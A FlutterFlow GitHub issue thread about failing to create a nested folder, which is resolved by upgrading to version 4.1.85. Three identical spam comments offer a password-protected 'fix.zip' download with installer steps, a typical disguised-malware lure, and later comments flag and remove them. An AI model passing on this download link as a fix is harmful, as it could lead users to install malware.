### ISSUE TITLE
Not able to create a folder inside a folder

### ISSUE THREAD

**Issue by franziz** [FlutterFlow/flutterflow-issues#3687]
### Can we access your project?

- [X] I give permission for members of the FlutterFlow team to access and test my project for the sole purpose of investigating this issue.

### Current Behavior

I am trying to create a folder inside a folder. It was a success previously. But now, I cannot create a folder inside a folder. There is no error on it.

- Creating a folder in Pages folder works with no issue
- Creating a folder inside a folder is not working
- No error was shown during creating a folder.

### Expected Behavior

I am expecting the folder that I just created appears.

### Steps to Reproduce

1. Create a folder in the `pages` folder. For example, HomePage
2. Under the HomePage, create a new folder
The new folder will not be created

### Reproducible from Blank

- [X] The steps to reproduce above start from a blank project.

### Bug Report Code (Required)

IT40k8nlz4pgobxc15D2dvpV+WA5KVgnar8ZjcJraCosfZT2BLMcec/RVERWQuGgS3w7JlqWjWoW3NLXkezlKvEDG06sGJxkzJFfEz3JXk6nMoy1FJWgemh9O9JPBWmO4Luw2xNAPvtoWkEuwGD7A9y8cHTsNrq3DW08Dq/LZO4=

### Visual documentation

[Video recording](https://github.com/user-attachments/assets/bac3e975-0037-4a97-a074-7427b3c684f5
)

### Environment

```markdown
- FlutterFlow version: 4.1.83
- Platform:Mobile
- Browser name and version: Desktop
- Operating system and version affected: MacOS
```

### Additional Information

This is not super critical, as I can still create a component, but it bothers me due to I need to work they way is is not structured

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by franziz** [comment]
Hey Admin, I have no idea, but the above link is a bit sus for me.

**Comment by Alezanello** [comment]
Hi there!

Yes, that was definitely suspicious, but I’ve already deleted it—no worries.

As for your issue, I wasn’t able to replicate it on my end. Could you try again to see if it was just a temporary sync error with the servers?

<img src="https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/4b8109c1-630a-467e-937f-946ea8d8e5e7/4e719da5-66a1-41b5-bf08-ae10b309d24b?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS80YjgxMDljMS02MzBhLTQ2N2UtOTM3Zi05NDZlYThkOGU1ZTcvNGU3MTlkYTUtNjZhMS00MWI1LWJmMDgtYWUxMGIzMDlkMjRiIiwiaWF0IjoxNzI0Njc2NTEyLCJleHAiOjMzMjk1MjM2NTEyfQ.3FNEbur1XREpzpllkoEGQHxG6bTh8DfDHFz4coWEEyg " alt="createFolder2.gif" width="1195" height="672" />

**Comment by franziz** [comment]
It still doesn't work, your screen recording seems using version 4.1.64 instead of 4.1.83

**Comment by franziz** [comment]
It works after upgrading the version to 4.1.85

**Comment by franziz** [comment]
It works after upgrading the version to 4.1.85
